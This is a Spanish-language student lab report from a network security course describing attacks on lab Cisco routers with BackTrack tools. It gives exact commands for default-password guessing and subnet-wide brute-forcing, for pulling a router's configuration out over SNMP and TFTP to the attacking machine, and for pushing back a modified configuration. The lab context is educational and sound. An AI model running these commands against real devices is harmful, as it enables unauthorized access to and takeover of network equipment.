Post on 13-Oct-2015
Santiago Sur Ingeniera en Telecomunicaciones,
Conectividad y Redes
Seguridad en Redes
ATAQUES CON BACKTRACK
Nombre Alumno (s): Elias Cossio
Jorge Quezada
Nombre Profesor: Rene Guerrero
Fecha: 12 de noviembre de 2013
Cisco Auditing Tool
La topologa que utilizaremos ser la siguiente.
Cisco Auditing Tool (CAT) es una mini herramienta de auditora de seguridad. Analiza
las vulnerabilidades ms comunes de los routers Cisco, como las contraseas por
defecto, las cadenas de comunidad SNMP y algunos de los antiguos errores del IOS.
Incluye tambien soporte para dems plugins y el escaneo de mltiples hosts.
Tras una previa configuracin de un router por defecto de sus contraseas lo que
aremos ser descubrir la clave de acceso y asi poder cambiar el router a nuestro gusto.
Ahora vemos la ip de nuestro backtrack y probamos conectividad
En BackTrack para iniciar la herramienta Cisco Auditing Tool nos vamos al
men Aplications - BackTrack - Vulnerability Assessment - Network Assessment - Cisco
Tools. Una vez que la ventana de la consola se haya cargado correctamente,
podremos mirar todas las opciones posibles que podemos utilizar en contra del nuestro
objetivo.
Backtrack trae unas contraseas por defecto configuradas, pero para darle ms
posibilidades de encontrar la contrasea se puede editar un archivo e indicarle claves
para buscar.
Primero sacaremos la contrasea con las configuradas por defecto.
Utilizamos la siguiente opcin:
./CAT h 192.168.1.1
Nos arroja como resultado que la contrasea arrojada fue cisco esta clave la probaremos despus haciendo un telnet desde aqu.
Ahora editaremos el archivo.
Con el comando:
Nano /pentest/cisco/cisco-auditing-tool/lists/passwords
Una vez editado el archivo guardamos y utilizamos la siguiente secuencia para
descubrir la contrasea:
./CAT -h 192.168.1.1 -a lists/passwords
Nos arroja la misma contrasea anterior cisco ahora vamos a probar si es la correcta realizando un telnet.
Cisco Passwd Scanner La topologa que utilizaremos para realizar las pruebas ser la siguiente
Cisco passwd scanner es una herramienta incluida en el grupo de vulnerabilidades
Cisco. Su funcin principal es buscar en un rango de IP que an no han sido
configurados correctamente y que por ende, tenga activada la contrasea por
defecto en el equipo.
Comenzamos abriendo la herramienta.
Nos aparecer un terminal como el siguiente
La herramienta realizara un scanner sobre toda la red que se le indique verificando
cuales routers existentes dentro de la red tienen activada la contrasea por defecto
cisco. El scanneo se realiza a travs de un ataque de fuerza bruta de un solo intento, probando la palabra de cisco en cada uno de los routers encontrados. Si la conexin con la contrasea cisco es exitosa, la direccin del router ser listada en los resultados del comando.
El comando que utilizaremos ser el siguiente
./ciscos 192.168.1 3 t 10
Los resultados son escritos en un archivo de texto llamado cisco.txt que se ubica en la
carpeta /pentest/cisco/ciscos.
Ahora probaremos los resultados realizando telnet a esas direcciones
Copy Router Config
Consiste en tomar la configuracin (Running-config) de un router, y llevarla como un
archivo, mediante tftp, hasta la mquina con la cual se est haciendo el ataque.
La imagen muestra la topologa utilizada, donde la Nube representa la mquina
desde donde se realizaron los ataques.
Nota: Para realizar este ataque, se necesita tener configurado un servidor tftp, en este
caso, en el equipo BACKTRACK.
La captura anterior muestra el men donde se encuentra la aplicacin para realizar el
ataque: copy-router-config.
En la captura anterior, se resalta, mediante un cuadro amarillo la lnea de comando
para hacer efectivo el ataque: perl copy-router-config.pl 192.168.1.20 [IP ROUTER]
192.167.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router]
Luego de procesar el ataque, el sistema enva un OK, indicando que fue realizado con
xito.
En la captura anterior se ingresa al directorio que contiene los archivos que se han
transferido mediante el protocolo TFTP. En este caso, el archivo de configuracin del
Router atacado ha enviado el archivo pwnd-router.config.
Finalmente, al ingresar al archivo, se puede apreciar la configuracin del router. En los
cuadros de color amarillo se destaca el hostname y la configuracin de la interfaz f 0/0
que se configur para realizar el laboratorio. As se comprueba que, efectivamente, el
ataque ha sido realizado con xito.
Merge Router Config
Es la operacin inversa al ataque anterior (Copy Router Config), y por lo general se
trabaja con mbos. Consiste en modificar el archivo de configuracin que el router le
entrega a BackTrack para luego volver a inyectarlo al mismo router, con una nueva configuracin.
Se utiliz la misma topologa que en el ataque Copy Router Config.
Se han modificado algunos parmetros, por ejemplo, el hostname pasar de R1 a
ROUTER_ATACADO; las interfaces tendrn ahora descripciones y finalmente se ha
configurado una de las lneas vty con un password, adems de un mensaje banner.
La marca amarilla indica la aplicacin que se utilizar para el ataque: merge config
router
La lnea de comando es la siguiente: perl merge-router-config.pl 192.168.1.20 [IP
ROUTER] 192.168.1.10 [IP BACKTRACK] private [Relacionado con las comunidades snmp
configuradas en el router].
Luego, el correspondiente OK para confirmar que el ataque ha sido realizado con
xito.
Inmediatamente, en la consola del router aparece un mensaje indicando que se ha
cargado una configuracin nueva a travs de la ip 192.168.1.10 (BACKTRACK) va tftp.
Finalmente, se procede a revisar la configuracin del router, y efectivamente, los
cambios realizados en el archivo se han cargado con xito. Se aprecia el cambio de la
lnea vty 0, la descripcin de la interfaz, el banner motd.